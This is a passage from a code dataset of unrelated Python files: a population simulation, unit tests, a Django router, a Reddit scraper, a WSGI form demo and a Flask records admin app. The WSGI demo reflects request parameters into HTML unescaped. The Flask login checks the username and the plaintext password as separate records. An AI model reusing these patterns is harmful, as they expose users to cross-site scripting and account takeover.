math.pi)\n self.population.append(Individual(x_start, y_start, mass, step_mean, diversion, angle, self))\n self.list_step.append(step_mean)\n self.list_diversion.append(diversion)\n self.list_x.append(x_start)\n\n def a_day_in_the_life(self):\n '''An hour in the life of the individual'''\n rnd.shuffle(self.population)\n old_pop = self.population[:]\n self.population.clear()\n for ind in old_pop:\n ind.move()\n if ind.alive:\n if 0 <= ind.x < max_x:\n resources_position = self.environment[int(ind.x)][int(ind.y)]\n ind.resources += min(resources_position, ind.ingestion)\n self.environment[int(ind.x)][int(ind.y)] -= ind.resources\n if ind.reproductive_age <= ind.age:\n ind.reproduction()\n else:\n ind.age += 1\n self.population.append(ind)\n else:\n ind.die()\n\n if self.movie:\n for x in range(self.max_x):\n for y in range(self.max_y):\n self.visual.color_square(self.environment[x, y], x, y)\n\n for patch in self.list_resources:\n if patch[0] in range(self.seasonality[0], self.seasonality[1]):\n self.list_regrowth.append((2 * regrowth) * (1 - self.environment[patch[0]][patch[1]] / (2 * carrying_capacity)))\n self.environment[patch[0]][patch[1]] += 2 * regrowth * (1 - self.environment[patch[0]][patch[1]] / (2 * carrying_capacity))\n\n\n np.clip(self.environment, 0, carrying_capacity, out=self.environment)\n self.pop_size.append(len(self.population))\n self.mean_resources.append(np.mean(self.environment))\n self.mean_step.append(np.mean(self.list_step))\n self.mean_diversion.append(np.mean(self.list_diversion))\n self.mean_regrowth.append(np.mean(self.list_regrowth))\n self.mean_x.append(np.mean(self.list_x))\n self.list_regrowth.clear()\n\n if self.movie:\n self.visual.canvas.update()\n\n\nmutation_rate = 0.01\ngenerations = 30000\ncell_size = 0.25 #m\nmass = 0.001\nlist_h = [0, 0.5, 1]\nlist_p = [0.05, 0.2, 0.5, 0.9]\nregrowth = 15 * ((2 * mass ** 0.8) * (3600 - 150))\ncarrying_capacity = 20 * ((2 * mass ** 0.8) * (3600 - 150))\ntimer_list = range(generations)\ncolor_list = [\"yellow\", \"red\", \"green\", \"blue\", \"black\", \"cyan\", \"magenta\", \"brown\", \"orange\"]\nmax_x = 150\nmax_y = 150\nruns = 9\nstart_population = 10000\nstep_min, step_max = 0, 10\ndiv_min, div_max = 0, math.pi\n\nwith open(\"random walk with seasonality.csv\", \"w\") as csvfile:\n writer = csv.writer(csvfile, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL)\n writer.writerow(['mass (kg)', 'dimensions', 'autocorrelation', 'suitable habitat', 'run', 'step mean', 'mean divergence',\n 'population size', 'mean resources', 'mean regrowth', 'mean x'])\n\nwith open(f'runs random walk with seasonality (p = {list_p[-1]}).csv', \"w\") as csvfile:\n writer = csv.writer(csvfile, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL)\n writer.writerow(['mass (kg)', 'autocorrelation', 'suitable habitat', 'run', 'ind', 'step length',\n 'divergence', 'x-position'])\n\nfor autocorrelation in list_h:\n for suitable_habitat in list_p:\n\n fig, ((ax1, ax2), (ax3, ax4), (ax5, ax6)) = plt.subplots(3, 2, sharex=True, figsize=(8, 8))\n fig1, axises1 = plt.subplots(3, 3, figsize=(8, 8))\n fig2, axises2 = plt.subplots(3, 3, figsize=(8, 8))\n fig6, axises6 = plt.subplots(3, 3, figsize=(8, 8))\n fig3, axises3 = plt.subplots(3, 3, figsize=(8, 8))\n fig4, axises4 = plt.subplots(3, 3, figsize=(8, 8))\n fig5, axises5 = plt.subplots(3, 3, figsize=(8, 8))\n ax1.set_title('Population size')\n ax2.set_title('Mean amount of resources (J)')\n ax3.set_title('Mean divergence (rad)')\n ax4.set_title('Mean step length (grid cells)')\n ax5.set_title('Mean regrowth')\n ax6.set_title('Mean x-coordinate')\n\n for simulation in range(runs):\n meta = Metapopulation(max_x, max_y)\n axises1[simulation // 3, simulation % 3].hist(meta.list_diversion)\n axises2[simulation // 3, simulation % 3].hist(meta.list_step)\n axises3[simulation // 3, simulation % 3].hist(meta.list_x)\n for timer in range(generations):\n if timer % 720 == 0 and timer != 0:\n meta.seasonality[0] += meta.direction_seasonality\n meta.seasonality[1] += meta.direction_seasonality\n if meta.seasonality[1] == meta.max_x or meta.seasonality[0] == 0:\n meta.direction_seasonality = -meta.direction_seasonality\n meta.a_day_in_the_life()\n print(timer)\n print(len(meta.population))\n \n if timer == generations - 1:\n if meta.pop_size[-1] > 100:\n sample_pop = []\n copy_pop = meta.population[:]\n for i in range(100):\n sample = rnd.choice(copy_pop)\n sample_pop.append(sample)\n copy_pop.remove(sample)\n else:\n sample_pop = meta.population[:]\n ind_nr = 1\n for i in sample_pop:\n with open(f'runs random walk with seasonality (p = {list_p[-1]}).csv', 'a', newline='') as ind:\n iwriter = csv.writer(ind)\n iwriter.writerow([f'{mass}', f'{autocorrelation}', f'{suitable_habitat}', f'{simulation}',\n f'{ind_nr}', f'{i.step_mean}', f'{i.diversion}', f'{i.x}'])\n ind_nr += 1\n\n\n\n with open(\"random walk with seasonality.csv\", 'a', newline='') as f:\n fwriter = csv.writer(f)\n fwriter.writerow([f'{mass}', f'{autocorrelation}', f'{suitable_habitat}', f'{simulation}',\n f'{meta.mean_step[-1]}', f'{meta.mean_diversion[-1]}', f'{meta.pop_size[-1]}',\n f'{meta.mean_resources[-1]}', f'{meta.mean_regrowth[-1]}', f'{meta.mean_x[-1]}'])\n\n ax1.plot(timer_list, meta.pop_size, color_list[simulation], animated=False)\n ax2.plot(timer_list, meta.mean_resources, color_list[simulation], animated=False)\n ax3.plot(timer_list, meta.mean_diversion, color_list[simulation], animated=False)\n ax4.plot(timer_list, meta.mean_step, color_list[simulation], animated=False)\n ax5.plot(timer_list, meta.mean_regrowth, color_list[simulation], animated=False)\n ax6.plot(timer_list, meta.mean_x, color_list[simulation], animated=False)\n axises4[simulation // 3, simulation % 3].hist(meta.list_diversion)\n axises5[simulation // 3, simulation % 3].hist(meta.list_step)\n axises6[simulation // 3, simulation % 3].hist(meta.list_x)\n\n fig.legend(labels=[f\"Run {i}\" for i in range(runs)], loc=\"lower center\", ncol=5)\n fig.savefig(f'random walk with seasonality (mass = 1.25g, p = {suitable_habitat} and h = {autocorrelation}).png', dpi=200)\n fig1.suptitle('Distribution of divergence at time = 0', size=20)\n fig2.suptitle('Distribution of step length at time = 0', size=20)\n fig3.suptitle('Distribution of x-coordinates at time = 0', size=20)\n fig4.suptitle(f'Distribution of divergence at time = {timer}', size=20)\n fig5.suptitle(f'Distribution of step length at time = {timer}', size=20)\n fig6.suptitle(f'Distribution of x-coordinates at time = {timer}', size=20)\n\n fig1.savefig('fig1.png', dpi=200)\n fig2.savefig('fig2.png', dpi=200)\n fig3.savefig('fig3.png', dpi=200)\n fig4.savefig('fig4.png', dpi=200)\n fig5.savefig('fig5.png', dpi=200)\n fig6.savefig('fig6.png', dpi=200)\n files = [Image.open(pic) for pic in [f'fig{i}.png' for i in range(1, 7)]]\n w, h = 400, 400\n result = Image.new(\"RGB\", (w * 2, h * 3))\n\n for index, file in enumerate(files):\n file.thumbnail((w, h), Image.ANTIALIAS)\n x = index // 3 * w\n y = index % 3 * h\n result.paste(file, (x, y, x + w, y + h))\n result.save(f'allele distribution random walk with seasonality (mass = 1.25g, p = {suitable_habitat} and h = {autocorrelation}).png', dpi=(300, 300))\n\nif meta.movie:\n tk.mainloop()\n","sub_path":"Seasonal landscape/code seasonal.py","file_name":"code seasonal.py","file_ext":"py","file_size_in_byte":16066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"48573500","text":"import pytest\nfrom compute_graph import ComputeGraph\nfrom compute_graph.operation import Map\n\n\ndef get_simple_data():\n return [\n {\"1\": 1, \"2\": 2},\n {\"1\": 3, \"2\": 4},\n {\"1\": 5, \"2\": 6},\n {\"1\": 7, \"2\": 8}\n ]\n\ndef mapper_1(r):\n yield {\n \"1\": r[\"2\"]\n }\n\ndef mapper_2(r):\n for key, value in r.items():\n yield {\n key: value\n }\n\n\ndef test_simple_map():\n g = ComputeGraph(inputs=get_simple_data(), outputs=[],\n save_to_variable=True)\n g.add(Map(mapper=mapper_1))\n g.compile()\n g.run()\n resp = [\n {\"1\": 2},\n {\"1\": 4},\n {\"1\": 6},\n {\"1\": 8}\n ]\n assert g.output_node.output == resp\n\ndef test_one_to_many_map():\n g = ComputeGraph(inputs=get_simple_data(), outputs=[],\n save_to_variable=True)\n g.add(Map(mapper=mapper_2))\n g.compile()\n g.run()\n resp = [\n {\"1\": 1}, {\"2\": 2},\n {\"1\": 3}, {\"2\": 4},\n {\"1\": 5}, {\"2\": 6},\n {\"1\": 7}, {\"2\": 8}\n ]\n assert g.output_node.output == resp\n\n\n\n\n\n","sub_path":"1st-term/Python/computation-graph/tests/test_map.py","file_name":"test_map.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"220372292","text":"\"\"\"\nTest the application startup template\n\nThis script provides unit testLogging that validate the template\n`global_village_start.py`. Part of the code in the template runs at module\nlevel. This code will be checked by importing the module that contains the\ntemplate script.\n\n.. only:: development_administrator\n\n Module management\n \n Created on Apr. 30, 2020\n \n @author: Jonathan Gossage\n\"\"\"\n\nimport importlib\nimport unittest\nimport sys\n\nimport lib.configuration as _c\nfrom lib.configuration import Configuration as _C\n\ntemplate = 'pydev.gv_start_template'\n\ndef verifyModule(self):\n\n def verifyModule(self):\n cfg = self._tp.cfg # Get the actual configurationx\n #TODO: startup_test - This test will run with simulated command line arguments and configurationx files\n cfg[_c.noargs] = True\n _C.insert(cfg.cmdargs)\n \n # Now test the results from running the high-level code module-level\n # code. This actually ran in the setup function since the template was\n # imported there.\n self.assertTrue(isinstance(cfg, dict),\n f'The configurationx is not a dictionary - {type(cfg)}')\n l = _C(cfg).len() # Number of entries in the configurationx\n num = 8 # The expected number of entries in the configurationx\n self.assertEqual(l, num,\n f'The configurationx dictionary should have {num} item(s), has {l} '\n '\\n The entries are: {cfg}')\n #TODO: Cleanup and use the platform module to use this code\n \"\"\"\n plid = cfg.plid # The determined operating system\n plsys = 'linux' # The expected operating system\n self.assertEqual(plid, plsys,\n 'The configurationx dictionary should say running on {} - is {}'.\\\n format(plid, plsys))\n \"\"\"\n self.assertIsNone(cfg[_c.uac],\nf'We should not have access to the user startup module yet - have {cfg[_c.uac]}')\n\ndef verifyFunction(self):\n num = 10 # The expected number of entries in the configurationx\n l = _C(self._tp.cfg).len() # Number of entries in the configurationx\n self.assertEqual(l, num,\n f'The configurationx dictionary should have {num} item(s), has {l} '\n '\\n The entries are: {cfg}')\n\ndef reload(template):\n if template in sys.modules:\n _tp = importlib.import_module(template)\n else:\n # Reloading the module gets rid of the old\n # copy of the template\n _tp = importlib.reload(template)\n return _tp\n\n\nclass TestModule(unittest.TestCase):\n\n def setup(self):\n \"\"\"\n This will load the script module and will run the module level code\n without invoking the code in the main() module level function. The\n main() function will be invoked separately thus separating the testing\n of the two levels of code\n \"\"\"\n self._tp = reload(template)\n\n def testModule(self):\n verifyModule(self)\n\n@unittest.skip('Not fully implemented yet')\nclass TestFunction(unittest.TestCase):\n \"\"\"\n The unittest driver for the `StartupApp` template\n This is a functional test that verifies that the StartupApp template does\n the right thing ad is usable as a template.\n \"\"\"\n \n def setup(self):\n \"\"\"\n This will load the script module and will run the module level code\n without invoking the code in the main() module level function. The\n main() function will be invoked separately thus separating the testing\n of the two levels of code.\n \"\"\"\n\n self._tp = reload(template)\n\n def testFunction(self):\n\n verifyModule(self)\n \n # The next step is to run the main() function\n self._tp.main()\n\n # Run unit testLogging on the result of running the main startup function\n verifyFunction(self)\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"lib/test/unittests/startup_test.py","file_name":"startup_test.py","file_ext":"py","file_size_in_byte":3932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"236943664","text":"from collections import deque\n\ndx = [-1, 0, 0, 1]\ndy = [0, -1, 1, 0]\nshark = []\nN = int(input())\nlst= []\nfor _ in range(N):\n lst.append(list(map(int, input().split())))\n\nfor i in range(N):\n for j in range(N):\n if lst[i][j] == 9:\n shark = (2,i,j)\n lst[i][j] = 0\n\ncnt = 0\n\n# bfs\ndef bfs(shark,cnt, stack):\n q= deque()\n q.append([shark[1],shark[2]])\n visited = [[-1]*N for _ in range(N)]\n visited[shark[1]][shark[2]] = cnt\n eatLst = []\n while q:\n qlen = len(q)\n while qlen:\n x,y = q.popleft()\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0<=nx /', views.detail, name='detail'),\n path('current_number//', views.current_number, name='current_number'),\n path('api/increment/', views.increment, name='increment'),\n path('get_wallet/', views.get_wallet, name='get_wallet'),\n path('get_queue//', views.get_queue, name='get_queue'),\n path('assign_number/', views.assign_number, name='assign_number'),\n path('', views.listing, name='listing'),\n path('compare_faces/', views.compare_faces, name='compare_faces'),\n path('login/', views.login, name='login')\n]\n","sub_path":"queuer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"309486876","text":"import tensorflow as tf\nimport os\nimport logging\ndef start_session():\n saver = tf.train.Saver()\n sess = tf.get_default_session()\n init = tf.global_variables_initializer()\n sess.run(init)\n # Start the queue runners.\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n\n session = {}\n session['sess'] = sess\n session['saver'] = saver\n session['coord'] = coord\n session['thread'] = threads\n\n return session\n\ndef cfg():\n \"\"\"General configuration values.\"\"\"\n return None\n\n\ndef _set_cfg_value(cfg_name, env_name, default, cfg):\n \"\"\"Set a value for the configuration.\n\n Parameters\n ----------\n cfg_name : str\n env_name : str\n default : str\n cfg : function\n \"\"\"\n if env_name in os.environ:\n setattr(cfg, cfg_name, os.environ[env_name])\n else:\n logging.info(\"No environment variable '%s' found. Set to '%s'.\",\n env_name,\n default)\n setattr(cfg, cfg_name, default)\n\n\n_set_cfg_value('plugin_dir',\n 'TV_PLUGIN_DIR',\n os.path.expanduser(\"~/tv-plugins\"),\n cfg)\n_set_cfg_value('step_show', 'TV_STEP_SHOW', 50, cfg)\n_set_cfg_value('step_eval', 'TV_STEP_EVAL', 250, cfg)\n_set_cfg_value('step_write', 'TV_STEP_WRITE', 1000, cfg)\n_set_cfg_value('max_to_keep', 'TV_MAX_KEEP', 10, cfg)\n_set_cfg_value('step_str',\n 'TV_STEP_STR',\n ('Step {step}/{total_steps}: loss = {loss_value:.2f}; '\n 'lr = {lr_value:.2e}; '\n '{sec_per_batch:.3f} sec (per Batch); '\n '{examples_per_sec:.1f} imgs/sec'),\n cfg)\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"381197785","text":"#!/usr/bin/python\n\"\"\"\nWatcher daemon-process\n\"\"\"\nimport time\nimport json\nimport hashlib\nimport os\nimport sys\nsys.path.append('/isodenv/scripts')\nfrom deployer_lib import *\n\ndef get_hash(path):\n \"\"\"\n Get hash for path to artifact\n \"\"\"\n return hashlib.md5(open(path, 'rb').read()).hexdigest()\n\ndef check_arts():\n \"\"\"\n Check valid json time config\n \"\"\"\n for art in ARTIFACTS:\n if JSONTIME[art][0] == \"\" or JSONTIME[art][1] == \"\" \\\n or JSONTIME[art][2] == \"\":\n return False\n return True\n\nwith open('/var/isodenv/watcher.pid', 'w') as pid:\n pid.write(str(os.getpid()))\n\nwith open('/isodenv/configs/config.json') as config:\n JSONDATA = json.loads(config.read())\n\nwith open('/var/isodenv/time.json') as config:\n JSONTIME = json.loads(config.read())\n\nARTIFACTS = JSONDATA['general']['artifacts'].split(', ')\n\nSKIP_DIRS = []\nif valid_config()['skip_dirs']:\n SKIP_DIRS = JSONDATA['general']['skip-directory'].split(', ')\n\nINTERVAL = parse_config()['interval']\n\nDEPLOY = False\nwhile not check_arts():\n DEPLOY = True\n set_time()\n with open('/var/isodenv/time.json') as config:\n JSONTIME = json.loads(config.read())\n time.sleep(INTERVAL)\n\nif DEPLOY:\n redeploy_app()\n set_time()\n\nwhile True:\n for key in ARTIFACTS:\n path_to_key = JSONTIME[key][2]\n clock = time.ctime(os.path.getmtime(path_to_key))\n if clock != JSONTIME[key][0]:\n if get_hash(path_to_key) != JSONTIME[key][1]:\n set_time()\n with open('/var/isodenv/time.json') as config:\n JSONTIME = json.loads(config.read()) \n if not check_arts():\n break \n redeploy_app()\n time.sleep(INTERVAL)\n","sub_path":"scripts/watch.py","file_name":"watch.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"79214914","text":"import re\nimport time\nfrom urllib.parse import urljoin\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nREDDIT_OLD_URL = 'https://old.reddit.com/r/'\nHEADERS = {'User-Agent': 'Mozilla/5.0'}\nNUM_REGEX = re.compile('[^0-9eE.]')\n\nFIELDS = ['Pontuação', 'Subreddit', 'Título', 'Comentários', 'Link']\n\n\nclass RedditScrapper:\n\n def __init__(self, subreddits='', min_votes=5000, num_pages=5):\n self.subreddits = subreddits.split(';')\n self.min_votes = min_votes\n self.num_pages = num_pages\n\n def run(self, format='string'):\n result = []\n for subreddit in self.subreddits:\n # initial url for subreddit\n url = urljoin(REDDIT_OLD_URL, subreddit)\n for i in range(self.num_pages):\n content = requests.get(url, headers=HEADERS).content\n soup = BeautifulSoup(content, features=\"html.parser\")\n for thread in soup.find_all('div', class_='thing'):\n votes = self._parse_votes(thread)\n if votes >= self.min_votes:\n link, title, comments = self._parse_links_and_title(\n thread, url)\n result.append(\n {\n key: value for key, value in\n zip(FIELDS,\n (votes, subreddit, title, comments, link))\n }\n )\n # find next page link and update url for next iteration\n url = soup.find('span', class_='next-button').find('a').attrs[\n 'href']\n # slowing dow the scrapper\n time.sleep(2)\n\n return self._format_result(result, format)\n\n def _parse_votes(self, thread):\n text = thread.find('div', class_='score unvoted').text\n # deal with new threads w/out votes\n text = text.replace('•', '0')\n # deal with thousand multipliers (is million necessary?)\n multiplier = {'k': 1e3, 'm': 1e6}\n if text[-1] in multiplier:\n return int(text[:1]) * multiplier[text[-1]]\n return int(text)\n\n def _parse_links_and_title(self, thread, url):\n title_link = thread.find('a', class_='title')\n # outbound links are absoltute but inbound links are relative\n if 'outbound' in title_link.attrs['class']:\n title_href = title_link.attrs['href']\n else:\n title_href = urljoin(url, title_link.attrs['href'])\n comment_link = thread.find('a', class_='comments')\n return title_href, title_link.text, comment_link.attrs[\n 'href']\n\n def _format_result(self, result, format):\n if not result:\n return \"Nenhuma thread bombamdo no momento :(\"\n str_list = []\n for thread in result:\n str_list.append(\n '\\n'.join(\n [f'{key} = {value}' for key, value in thread.items()]))\n if format == 'list':\n return str_list\n return '\\n\\n'.join(str_list)\n\n\nif __name__ == '__main__':\n s = RedditScrapper('cats;programming;brazil', 1000)\n print(s.run())\n","sub_path":"crawlers/scrapper.py","file_name":"scrapper.py","file_ext":"py","file_size_in_byte":3202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"198060110","text":"#!/usr/bin/env python\r\nimport os\r\nimport sys\r\nimport cgi\r\nfrom cgi import parse_qs\r\n\r\nform = b'''\r\n \r\n \r\n GET & POST Hello World!\r\n \r\n \r\n
\r\n \r\n \r\n \r\n

\r\n '''\r\n\r\ndef app(environ, start_response):\r\n \r\n html = form\r\n \r\n if environ['REQUEST_METHOD'] == 'POST':\r\n post_env = environ.copy()\r\n post_env['QUERY_STRING'] = ''\r\n post = cgi.FieldStorage(\r\n fp=environ['wsgi.input'],\r\n environ=post_env,\r\n keep_blank_values=True\r\n )\r\n html += b'Your POST parameter: ' + post['examplePost'].value + ';'\r\n\r\n if environ['REQUEST_METHOD'] == 'GET':\r\n params = parse_qs(environ['QUERY_STRING'])\r\n for key, values in params.iteritems():\r\n html += b'Your GET parameter: ' + key + ' has values: '\r\n for value in values:\r\n html += b'' + value + ',
'\r\n\r\n end = b'''\r\n

\r\n
\r\n \r\n \r\n '''\r\n html += end\r\n\r\n start_response('200 OK', [('Content-Type', 'text/html')])\r\n return [html]\r\n\r\nif __name__ == '__main__':\r\n try:\r\n from wsgiref.simple_server import make_server\r\n httpd = make_server('127.0.0.1', 8081, app)\r\n print('Server is up on port 8081')\r\n httpd.serve_forever()\r\n except KeyboardInterrupt:\r\n print(' Oh no, I died .-.')\r\n","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"183212962","text":"from app import app, db\nfrom flask import render_template, request, redirect, url_for, flash\nfrom .models import (Pribadi, Polsek, Medcen, DataLapor, \n NomorLayananPolsek, NomorLayananMedcen, WebsiteResmiPolsek, WebsiteResmiMedcen, \n ProsedurLaporPolsek, ProsedurLaporMedcen, User)\nfrom flask_login import login_user, current_user, logout_user, login_required\nfrom .forms import LoginForm\n\n\n\n@app.route('/dashboard')\n@login_required\ndef home(): \n return render_template('index.html', title='Dashboard', menu='dashboard', \n data=Pribadi.query.all(), data2=Polsek.query.all(), data3=Medcen.query.all(), data4a=ProsedurLaporPolsek.query.all(), \n data4b=ProsedurLaporMedcen.query.all(), data5a=NomorLayananPolsek.query.all(), data5b=NomorLayananMedcen.query.all(), \n data6a=WebsiteResmiPolsek.query.all(),data6b=WebsiteResmiMedcen.query.all(), data7=DataLapor.query.all())\n\n@app.route('/', methods=['GET','POST'])\n@app.route('/login', methods=['GET','POST'])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n form = LoginForm()\n if form.validate_on_submit():\n user = User.query.filter_by(username=form.username.data).first()\n password = User.query.filter_by(password=form.password.data).first()\n if user and password:\n login_user(user)\n next_page = request.args.get('next')\n return redirect(next_page) if next_page else redirect(url_for('home'))\n # return redirect(url_for('home'))\n return render_template ('login.html', form=form, title='Login')\n\n\n@app.route('/logout')\ndef logout():\n logout_user()\n return redirect(url_for('login'))\n\n@app.route('/pribadi/')\n@login_required\ndef pribadi():\n return render_template('pribadi/pribadi.html', title='Pribadi', submenu='dataPribadi', link1='Data Pribadi' ,data=Pribadi.query.all())\n\n@app.route('/pribadi/tambah/', methods=['GET','POST'])\n@login_required\ndef pribadiAdd():\n if request.method == 'POST':\n nrp = request.form['nrp']\n ktp = request.form['ktp']\n kk = request.form['kk']\n stnk = request.form['stnk']\n nama = request.form['nama']\n alamat = request.form['alamat']\n nophone = request.form['nophone']\n data = Pribadi(nrp=nrp, ktp=ktp, kk=kk, stnk=stnk, nama=nama, alamat=alamat, nomorHP=nophone)\n db.session.add(data)\n db.session.commit()\n return redirect(url_for('pribadi'))\n else:\n return render_template('pribadi/pribadiAdd.html', title='Tambah Pribadi', submenu='dataPribadi' ,link1='Data Pribadi', link2='Tambah Data Pribadi', link3='pribadi/')\n\n@app.route('/pribadi//ubah/', methods=['GET','POST'])\n@login_required\ndef pribadiEdit(nrp):\n data = Pribadi.query.filter_by(nrp=nrp).first()\n if request.method == 'POST':\n data.nrp = request.form['nrp']\n data.ktp = request.form['ktp']\n data.kk = request.form['kk']\n data.stnk = request.form['stnk']\n data.nama = request.form['nama']\n data.alamat = request.form['alamat']\n data.nomorHP = request.form['nophone']\n db.session.add(data)\n db.session.commit()\n return redirect(url_for('pribadi'))\n else:\n return render_template('pribadi/pribadiAdd.html', title='Ubah Pribadi', submenu='dataPribadi' ,link1='Data Pribadi', link2='Ubah Data Pribadi', link3='pribadi/', data=data)\n\n@app.route('/pribadi//hapus/', methods=['GET','POST'])\n@login_required\ndef pribadiDel(nrp):\n data = Pribadi.query.filter_by(nrp=nrp).first()\n db.session.delete(data)\n db.session.commit()\n return redirect(url_for('pribadi'))\n# Akhir Pribadi\n\n\n# Awal DataLapor\n@app.route('/data_lapor/')\n@login_required\ndef lapor():\n return render_template('lapor/lapor.html', title='Data Lapor', submenu='data Lapor', link1='Data Lapor' ,data=DataLapor.query.all())\n\n@app.route('/data_lapor/tambah/', methods=['GET','POST'])\n@login_required\ndef laporAdd():\n if request.method == 'POST':\n nama = request.form['nama']\n kejadian = request.form['kejadian']\n nomorHP = request.form['nophone']\n lembaga = request.form['lembaga']\n data = DataLapor(nama=nama, kejadian=kejadian, nomorHP=nomorHP, lembagaBerwenang=lembaga)\n db.session.add(data)\n db.session.commit()\n return redirect(url_for('lapor'))\n else:\n return render_template('lapor/laporAdd.html', title='Data Lapor', submenu='data Lapor', link1='Data Lapor', link2='Tambah Data Lapor', link3='lapor/', data2=Pribadi.query.all())\n\n@app.route('/data_lapor//ubah/', methods=['GET','POST'])\n@login_required\ndef laporEdit(id):\n data = DataLapor.query.filter_by(id=id).first()\n if request.method == 'POST':\n data.nama = request.form['nama']\n data.kejadian = request.form['kejadian']\n data.nomorHP = request.form['nophone']\n data.lembagaBerwenang = request.form['lembaga']\n db.session.commit()\n return redirect(url_for('lapor'))\n else:\n return render_template('lapor/laporAdd.html', title='Ubah Lapor', submenu='data Lapor' ,link1='Data Lapor', link2='Ubah Data Lapor', link3='lapor/', data=data)\n\n@app.route('/data_lapor//hapus/', methods=['GET','POST'])\n@login_required\ndef laporDel(id):\n data = DataLapor.query.filter_by(id=id).first()\n db.session.delete(data)\n db.session.commit()\n return redirect(url_for('lapor'))\n\n# Akhir DataLapor\n\n\n# Awal Polsek\n\n@app.route('/polsek/')\n@login_required\ndef polsek():\n return render_template('polsek/polsek.html', title='Polsek', submenu='dataPolsek', link1='Data Polsek' ,data=Polsek.query.all())\n\n@app.route('/polsek/tambah/', methods=['GET','POST'])\n@login_required\ndef polsekAdd():\n if request.method == 'POST':\n kodePolsek = request.form['kdPolsek']\n namaPolsek = request.form['namaPolsek']\n alamatPolsek = request.form['alamat']\n data = Polsek(kodePolsek=kodePolsek, namaPolsek=namaPolsek, alamatKantor=alamatPolsek)\n db.session.add(data)\n db.session.commit()\n return redirect(url_for('polsek'))\n else:\n return render_template('polsek/polsekAdd.html', title='Tambah Polsek', submenu='dataPolsek' ,link1='Data Polsek', link2='Tambah Data polsek', link3='polsek/')\n\n@app.route('/polsek//ubah/', methods=['GET','POST'])\n@login_required\ndef polsekEdit(kodePolsek):\n data = Polsek.query.filter_by(kodePolsek=kodePolsek).first()\n if request.method == 'POST':\n data.kodePolsek = request.form['kdPolsek']\n data.namaPolsek = request.form['namaPolsek']\n data.alamatKantor = request.form['alamat']\n db.session.add(data)\n db.session.commit()\n return redirect(url_for('polsek'))\n else:\n return render_template('polsek/polsekAdd.html', title='Ubah Polsek', submenu='dataPolsek' ,link1='Data Polsek', link2='Ubah Data Polsek', link3='polsek/', data=data)\n\n@app.route('/polsek//hapus/', methods=['GET','POST'])\n@login_required\ndef polsekDel(kodePolsek):\n data = Polsek.query.filter_by(kodePolsek=kodePolsek).first()\n db.session.delete(data)\n db.session.commit()\n return redirect(url_for('polsek'))\n\n# Akhir Polsek\n\n\n# Awal Medcen\n\n@app.route('/medcen/')\n@login_required\ndef medcen():\n return render_template('medcen/medcen.html', title='Medcen', submenu='dataMedcen', link1='Data Medcen' ,data=Medcen.query.all())\n\n@app.route('/medcen/tambah/', methods=['GET','POST'])\n@login_required\ndef medcenAdd():\n if request.method == 'POST':\n alamatKantor = request.form['alamatKantor']\n data = Medcen(alamatKantor=alamatKantor)\n db.session.add(data)\n db.session.commit()\n return redirect(url_for('medcen'))\n else:\n return render_template('medcen/medcenAdd.html', title='Tambah Medcen', submenu='dataMedcen' ,link1='Data Medcen', link2='Tambah Data Medcen', link3='medcen/')\n\n@app.route('/medcen//ubah/', methods=['GET','POST'])\n@login_required\ndef medcenEdit(id):\n data = Medcen.query.filter_by(id=id).first()\n if request.method == 'POST':\n data.alamatKantor = request.form['alamatKantor']\n db.session.add(data)\n db.session.commit()\n return redirect(url_for('medcen'))\n else:\n return render_template('medcen/medcenAdd.html', title='Ubah Medcen', submenu='dataMedcen' ,link1='Data Medcen', link2='Ubah Data Medcen', link3='medcen/', data=data)\n\n@app.route('/medcen//hapus/', methods=['GET','POST'])\n@login_required\ndef delMedcen(id):\n data = Medcen.query.filter_by(id=id).first()\n db.session.delete(data)\n db.session.commit()\n return redirect(url_for('medcen'))\n\n# Akhir Medcen\n\n\n\n\n# Awal Prosedur\n\n@app.route('/prosedur/')\n@login_required\ndef prosedur():\n return render_template('prosedur/prosedur.html', title='Prosedur', submenu='dataProsedur', link1='Data Prosedur' ,data=ProsedurLaporPolsek.query.all(), data2=ProsedurLaporMedcen.query.all())\n\n@app.route('/prosedur/tambah/', methods=['GET','POST'])\n@login_required\ndef prosedurAdd():\n if request.method == 'POST':\n kodePolsek = request.form['kodePolsek']\n if current_user.username == 'polsek':\n laporPolsek = request.files['laporPolsek']\n data = ProsedurLaporPolsek(kodePolsek=kodePolsek, ProsedurLaporPolsek=laporPolsek.filename)\n db.session.add(data)\n db.session.commit()\n return redirect(url_for('prosedur'))\n if current_user.username == 'medcen': \n laporMedcen = request.files['laporMedcen']\n data2 = ProsedurLaporMedcen(kodePolsek=kodePolsek, ProsedurLaporMedcen=laporMedcen.filename)\n db.session.add(data2)\n db.session.commit()\n return redirect(url_for('prosedur'))\n else:\n return render_template('prosedur/prosedurAdd.html', title='Tambah Prosedur', submenu='dataProsedur' ,link1='Data Prosedur', link2='Tambah Data Prosedur', link3='polsek/', dataPolsek=Polsek.query.all())\n\n# @app.route('/prosedur//ubah/', methods=['GET','POST'])\n# @login_required\n# def prosedurEdit(id):\n# if current_user.username == 'polsek':\n# data = ProsedurLaporPolsek.query.filter_by(id=id).first()\n# if current_user.username == 'medcen':\n# data2 